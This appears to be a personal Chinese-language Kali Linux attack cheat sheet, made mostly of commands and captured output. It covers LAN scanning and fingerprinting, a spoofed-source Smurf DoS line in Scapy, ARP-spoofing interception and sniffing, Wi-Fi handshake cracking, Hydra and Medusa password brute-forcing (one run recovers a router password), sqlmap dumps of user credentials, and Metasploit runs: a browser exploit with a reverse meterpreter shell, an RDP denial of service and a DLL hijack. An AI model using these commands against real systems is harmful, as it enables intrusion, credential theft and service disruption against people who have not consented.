Kali

TCP/IP三次握手的通信过程

ClientAndServerTCP/IP

nmap scripts:

root@kali:~# locate .nse | grep "http"
...
/usr/share/nmap/scripts/vtam-enum.nse
/usr/share/nmap/scripts/vuze-dht-info.nse
...

root@kali:~# nmap --script-help=telnet-ntlm-info.nse
telnet-ntlm-info
Categories: default discovery safe
https://nmap.org/nsedoc/scripts/telnet-ntlm-info.html
  This script enumerates information from remote Microsoft Telnet services with NTLM
  authentication enabled.
  Sending a MS-TNAP NTLM authentication request with null credentials will cause the
  remote service to respond with a NTLMSSP message disclosing information to include
  NetBIOS, DNS, and OS build version.

扫描内网设备

root@kali:~# netdiscover
 Currently scanning: 192.168.41.0/16   |   Screen View: Unique Hosts           
                                                                               
 5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 228               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.1     xx:15:e1:xx:13:42      1      42  Phicomm (Shanghai) Co., Ltd.
 192.168.2.207   xx:e0:4c:xx:11:3d      1      60  REALTEK SEMICONDUCTOR CORP. 
 192.168.2.222   xx:39:56:xx:74:87      1      42  HMD Global Oy               
 192.168.2.214   xx:b8:37:xx:c5:11      2      84  Sony Mobile Communications I

root@kali:~# nmap -sn 192.168.2.1
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-05 05:00 UTC
Nmap scan report for phicomm.me (192.168.2.1)
Host is up (0.0013s latency).
MAC Address: 2C:15:E1:0A:13:42 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

root@kali:~# nmap -sn 192.168.2.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-05 05:00 UTC
Nmap scan report for phicomm.me (192.168.2.1)
Host is up (0.0045s latency).
MAC Address: 2C:15:E1:0A:13:42 (Unknown)
Nmap scan report for LAPTOP-5893QA24.lan (192.168.2.207)
Host is up (0.0025s latency).
MAC Address: 00:E0:4C:36:11:3D (Realtek Semiconductor)
Nmap scan report for 192.168.2.222
Host is up (0.076s latency).
MAC Address: 20:39:56:CA:74:87 (Unknown)
Nmap scan report for 192.168.2.241
Host is up (0.072s latency).
MAC Address: 28:3F:69:C8:C6:23 (Sony Mobile Communications AB)
Nmap scan report for kali.lan (192.168.2.223)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.27 seconds

root@kali:~# nmap -[sn sT sS sA] 192.168.2.0/[24 16 8] | grep "("

scan ports

dmitry 192.168.2.1 -p # fast & easy
amap 172.16.36.135 80
nmap -[sS sT sU] 192.168.2.1 (-p 80-110)

NC

root@kali:~/Desktop/py# nc -nv 192.168.2.1 23
\xFF\xFD\x01\xFF\xFD\x1F\xFF\xFB\x01\xFF\xFB\x03

BusyBox v1.22.1 (2018-04-20 15:09:31 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

    ___  __ _______________  __  _____  ___  ________  ___
   / _ \/ // /  _/ ___/ __ \/  |/  /  |/  / / __/ __ \/ _ \
  / ___/ _  // // /__/ /_/ / /|_/ / /|_/ / _\ \/ /_/ / ___/
 /_/  /_//_/___/\___/\____/_/  /_/_/  /_/ /___/\____/_/
 ----------------------------------------------------------
 Barrier Breaker, unknown
 ----------------------------------------------------------
 PID=K2P
 BUILD_TYPE=release
 BUILD_NUMBER=189
 BUILD_TIME=20180420-145920
 ----------------------------------------------------------
 MTK OpenWrt SDK V3.4
 revision : 11a1c50c
 benchmark : APSoC SDK 5.0.1.0
 kernel : 144992
 -----------------------------------------------------
root@K2P:/# 

收集特定IP地址和独舞端口特征(amap better):

root@kali:~/Desktop/py# amap -[b B] 192.168.2.1 23
amap v5.4 (www.thc.org/thc-amap) started at 2019-02-04 15:39:34 - BANNER mode

Banner on 192.168.2.1:23/tcp : \r\n\r\nBusyBox v1.22.1 (2018-04-20 150931 CST) built-in shell (ash)\r\nEnter 'help' for a list of built-in commands.\r\n\r\n

amap v5.4 finished at 2019-02-04 15:39:35

#nmap banner:
root@kali:~/Desktop/py# nmap -sT 192.168.2.1 -p 23 --script=banner
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-04 15:42 UTC
Nmap scan report for phicomm.me (192.168.2.1)
Host is up (0.0013s latency).

PORT   STATE SERVICE
23/tcp open  telnet
|_banner: \xFF\xFD\x01\xFF\xFD\x1F\xFF\xFB\x01\xFF\xFB\x03
MAC Address: xx:15:E1:0A:13:xx (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds

操作系统识别

Scapy

sr1(IP(dst='192.168.2.1')/ICMP())

if ttl eual or less than 64 then target-device is linux/unix else ~ is windows

nmap

# nmap 192.168.2.1 -O
Nmap scan report for phicomm.me (192.168.2.1)
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
23/tcp open  telnet
53/tcp open  domain
80/tcp open  http
MAC Address: 2C:15:E1:0A:13:42 (Unknown)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.20 seconds

xprobe2

xprobe2 192.168.2.214

[+] Host 192.168.2.1 Running OS: linux Kernel 2.6.11" (Guess probability: 95%)
[+] Other guesses:
[+] Host 192.168.2.1 Running OS: linux Kernel 2.4.19" (Guess probability: 95%)
[+] Host 192.168.2.1 Running OS: linux Kernel 2.4.22" (Guess probability: 95%)

onesixtyone & snmpwalk

# 找出设备上的SNMP Community字串
root@KaliLinux:~# onesixtyone 172.16.36.134 public
Scanning 1 hosts, 1 communities 
172.16.36.134 [public] Hardware: x86 Family 6 Model 58 Stepping 9  AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600  Uniprocessor Free)

# 下面这个工具我没有成功过
root@KaliLinux:~# snmpwalk 172.16.36.134 -c public -v 2c | cut -d "="  -f 2 
STRING: "Hardware: x86 Family 6 Model 58 Stepping 9 AT/AT COMPATIBLE  - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)" 
OID: iso.3.6.1.4.1.311.1.1.3.1.1 
Timeticks: (75376) 0:12:33.76 
"" 
STRING: "DEMO-72E8F41CA4" 

防火墙识别 - 判断远程端口是否被防火墙设备过滤
ways to know it

nmap -sS 172.16.36.135
nmap -sA 172.16.36.135
#scapy
>>  sr1(IP(dst="192.168.2.1")/TCP(dport=22,flags='A'),timeout=1,verbose =1)

古老的Smurf DoS攻击

scapy

send(IP(dst="192.168.2.139",src="192.168.2.1")/ICMP(),count=100,verbose=1)

注:源 IP 地址被伪造为 LAN 上另一个系统的地址

放大攻击的原理是利用第三方设备,使网络流量压倒目标。 对于多数放大攻击,必须满足两个条件:

  1. 用于执行攻击的协议不验证请求源
  2. 来自所使用的网络功能的响应应该显着大于用于请求它的请求。

传统 smurf 攻击的效率取决于 LAN 上响应 IP 定向的广播流量的主机。这种主机从目标系统的伪造 IP 地址接收 ICMP 广播回响请求,然后针对接收到的每个请求同时返回 ICMP 回响应答。

ARP 欺骗:

这个指令很简单,功能单一,不记得可以 arpspoof -h 查看。Notice: Everytime after reboot, u should enable forwarding.

# arpspoof -i <device> -t <target_ip> <forward_to_ip>
# 首先要允许转发,目标无法上网: echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.2.139 192.168.2.1

原理就是不断向目标发送"网关是我(192.168.2.1 is at 00:c9:xx:xx:13:9c)"来欺骗目标设备,当目标设备发包过来时候,我们再把包转发到真正的网关去。
然后打开wireshark进行抓包,http过滤规则:

http && ip.src == 192.168.2.139

driftnet -i wlan0 可查看嗅探到的图片。开两个窗口运行了两个arpspoof可以同时欺骗两台主机,但是不支持欺骗整个内网。

Firefox inject cookie:

不知道为什么装了油猴子后执行cookie inject在控制台中看到函数被denied了,无语只能自己鼓捣一个。注:某些浏览器不支持document.cookie同时设置多个cookie
Add this to FF: https://addons.mozilla.org/en-US/firefox/addon/custom-style-script/?src=search
Open the options page and add the code below (url: *)

function addck(cookieText){
    var cookieArray = cookieText.split(";");
    for(var x=0; x<cookieArray.length; x++){
        document.cookie = cookieArray[x]+"; path=/";
    }
    console.log(document.cookie)
}
# usage: 控制台输入: addck("a=2;b=4;c=6")

WIFI破解

wifite & 网卡(支持监听模式)
运行 wifite --dict 字典文件。运行后选择指定wifi,这时候wifite就会自动寻找其连接的设备并踢掉,然后等待它们重新连接抓到wifi的握手包,存放在/root/hs目录下,并且自动破解wifi密码。
或者直接wifite获取握手包,然后在用:

aircrack-ng -w 字典 /root/hs/握手包

若破解不出来,可以重新获取握手包,再进行破解。

自带字典目录

/usr/share/wordlists/

dirb
big.txt #大的字典
small.txt #小的字典
catala.txt #项目配置字典
common.txt #公共字典
euskera.txt #数据目录字典
extensions_common.txt #常用文件扩展名字典
indexes.txt #首页字典
mutations_common.txt #备份扩展名
spanish.txt #方法名或库目录
others #扩展目录,默认用户名等
stress #压力测试
vulns #漏洞测试

dirbuster
apache-user-enum-** #apache用户枚举
directories.jbrofuzz #目录枚举
directory-list-1.0.txt #目录列表大,中,小 big,medium,small

fern-wifi
common.txt #公共wifi账户密码

metasploit
… #各种类型的字典

webslayer
general #普通字典目录
admin-panels.txt #后台路径 字典

Injections #注入字典目录
All_attack.txt #全部攻击
bad_chars.txt #字符注入
SQL.txt #sql注入
Traversal.txt #路径回溯
XML.txt #xml注入
XSS.txt #xxs注入

others #扩展目录
common_pass.txt #通用密码字典
names.txt #用户名字典

stress #压力测试目录

vulns #漏洞测试目录
apache、iis、cgis…

webservicces #web服务目录
ws-dirs.txt #路径测试
ws-files.txt #文件测试

wfuzz #模糊测试,各种字典…

在线破解

Findmyhash
在线哈希破解工具,借助在线破解哈希网站的接口制作的工具

字典生成

crunch [minimum length] [maximum length] [character set] [options]

-o:指定输出字典文件位置
-b:指定写入文件最大的字节数。该大小可以指定KB、MB或GB,必须与-o选项一起使用
-t:设置使用的特殊格式
-l:该选项用于当-t选项指定@、%或^时,用来识别占位符的一些字符
-p str1 str2 ...: 生成包含str的字典 如:str1 str4 str3 str2 即打乱顺序 (ps:前面的最大和最小长度任然要输入且对结果无影响)
-t 2018%%%%: %代表数字 @代表小写字母 逗号代表大写字母

Cupp
社工字典,执行cupp -i,输入被攻击目标的姓、名、外号、生日、父母的名字、外号、生日、子女的名字、外号、生日等等一系列的信息。如果你有这些信息,直接输入,如果没有直接回车进行下一步。

Cewl
该工具可以通过爬行网站获取关键信息创建一个密码字典。例如输入一个url,它通过提取返回这个url页面源码标签中的一些内容,把这些内容组合成字典,对管理员密码的一个特定枚举就更高效一些。

Hydra
该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP和VNC等。

hydra -L ~/pwd/user.txt -P ~/pwd/pass.txt -F ftp://127.0.0.1:21
hydra -L ~/pwd/user.txt -P ~/pwd/pass.txt -F ssh://127.0.0.1:22
hydra -L ~/pwd/user.txt -P ~/pwd/pass.txt -F mysql://127.0.0.1:3306
hydra -l administrator -P /home/dict/pwd.lst 127.0.0.1 ftp -v (-s 21)
# hydra -l admin -P ~/pwd/pass.txt -F mysql://127.0.0.1:3306
# 大写L为指定文件中的用户名,小写l可直接提供单个用户名
hydra -l admin -P ~/pwd/pass.txt 192.168.2.1 http-post-form"/plugins/login.php
:username=^USER^&password=^PASS^:login failed"-V

注:login failed为表单返回的登录失败消息
-V用于显示每次尝试的详细输出
:类似分割符
-o FILE 指定结果输出文件
-R 继续从上一次进度接着破解
-S 采用SSL链接(大写的S) 
-s PORT 如果非默认端口,可通过这个参数指定
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-w TIME 设置最大超时的时间:秒
-t TASKS 同时运行的线程数

更多操作看帮助或者使用其有UI的版本。
其UI版本——hydra-gtk中:如果要查看密码攻击的过程,将Output Options框中的Show Attempts复选框勾上
勾上Tuning选项卡下的Exit after first found pair,表示找到第一对匹配项时则停止攻击。
配置完后,单击到Start选项卡进行攻击。

Medusa
Medusa是通过并行登录暴力破解的方法,尝试获取远程验证服务访问权限。Medusa能够验证的远程服务,如AFP、FTP、HTTP、IMAP、MS SQL、NetWare、NNTP、PcAnyWhere、POP3、REXEC、RLOGIN、SMTPAUTH、SNMP、SSHv2、Telnet、VNC和Web Form等。
获取路由器的访问权:

# -e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
root@kali:~# medusa -h 192.168.5.1 -u admin -P /usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt -M http -e ns 80 -F
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: (1 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (2 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 12345 (3 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: abc123 (4 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: password (5 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: computer (6 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (7 of 3109 complete)
ACCOUNT CHECK: [http] Host: 192.168.5.1 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: huolong5 (8 of 3109 complete)
ACCOUNT FOUND: [http] Host: 192.168.5.1 User: admin Password: daxueba [SUCCESS]

sql注入
sqlmap - py

# 监测是否存在sql注入漏洞
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1
# 获取数据库名称
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1 --dbs
# 获取 db01 数据库中的表名
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1 -D dataname --tables
# 获取 users 表
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1 -D dataname -T table_name --columns
# 导出
sqlmap -u http://www.xxx.com/news_detail.php?newsno=1 -D dataname -T table_name -C "id,user,password" --dump

jsql - UI
jSQL injection是一款由JAVA开法的SQL自动化注入工具,它提供了数据库查询、后台爆破、文件读取、Web shell、SQL Shell、文件上传、暴力枚举、编码、批量注入测试等强大的功能,是一款非常不错的工具,也是渗透测试人员的强大助手。它支持GET\POST注入,同时也可以进行HTTP头注入(这个需要用户自动构建)

msf

Msf常用漏洞利用命令
search name:用指定关键字搜索可以利用的漏洞模块
use exploit name:使用漏洞
show options:显示配置选项
set option name option:设置选项
show payloads:回链攻击载荷
show targets 显示目标(os版本)
set TARGET target number(设置目标版本)
exploit(开始漏洞攻击)
sessions -l(列出会话)
sessions -i id(选择会话)
sessions -k id(结束会话)
Ctrl+z(把会话放到后台)
Ctrl+c(结束会话)
show auxiliary(显示辅助模块)
use auxiliary name (使用辅助模块)
set option name option(设置选项)
exploit(运行模块)

# 测试漏洞——ms10_018  IE浏览器漏洞实例——browser
msf > use exploit/windows/browser/ms10_002_aurora #(使用ms10_002_aurora模块)
msf exploit(ms10_002_aurora) > show options #(查看选项)
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.230.1 #(url地址)
msf exploit(ms10_002_aurora) > set SRVPORT 80 #(url地址端口)
msf exploit(ms10_002_aurora) > set URIPATH / #(网站根,默认就是/)
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp #(反弹载荷)
msf exploit(ms10_002_aurora) > set LHOST 192.168.230.185 #(payload反弹地址,写本机)
msf exploit(ms10_002_aurora) > set LPORT 1211 #(监听端口)
msf exploit(ms10_002_aurora) > exploit #(开始攻击)
msf exploit(ms10_002_aurora) > [*] Using URL: http://192.168.230.185:80/ #(生成url,此漏洞是激光漏洞,当我们把链接地址给目标访问,目标访问后就会反弹一个会话给本机)
msf exploit(ms10_002_aurora) > sessions -i #(查看目标)
sessions -i 1 #(选择id为1的主机)
Meterpreter > shell #(可以直接拿到主机的shell,然后可以执行系统命令)
# 测试漏洞——ms12_020 蓝屏攻击
msf > use auxiliary/scanner/rdp/ms12_020_check #(先用ms12_020_check模块扫描是否有漏洞)
msf auxiliary(ms12_020_check) > show options #(查看选项)
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.230.0/24 #(扫描目标网段)
msf auxiliary(ms12_020_check) > set THREADS 50 #(线程)
msf auxiliary(ms12_020_check) > exploit #(扫描后有vulnerable就说明有危险项)
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids #(利用ms12_020_maxchannelids漏洞)
msf auxiliary(ms12_020_maxchannelids) > show options #(查看选项)
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.230.129 #(选择有漏洞的主机)
msf auxiliary(ms12_020_maxchannelids) > set RPORT 3389 #(端口,可以不写,默认是3389)
msf auxiliary(ms12_020_maxchannelids) > exploit #(攻击)
# dll注入攻击——
msf > use exploit/windows/browser/webdav_dll_hijacker #(使用webdav_dll漏洞)
msf exploit(webdav_dll_hijacker) > show options #(查看选项)
msf exploit(webdav_dll_hijacker) > set SRVHOST 192.168.230.176 #(url地址)
msf exploit(webdav_dll_hijacker) > set SRVPORT 80 #(url端口)
msf exploit(webdav_dll_hijacker) > set URIPATH / #(网站根)
msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/bind_tcp #(反弹载荷)
msf exploit(webdav_dll_hijacker) > set LHOST 192.168.230.186 #(反弹监听地址)
msf exploit(webdav_dll_hijacker) > set LPORT 4444 #(反弹监听端口)
msf exploit(webdav_dll_hijacker) > exploit #(攻击)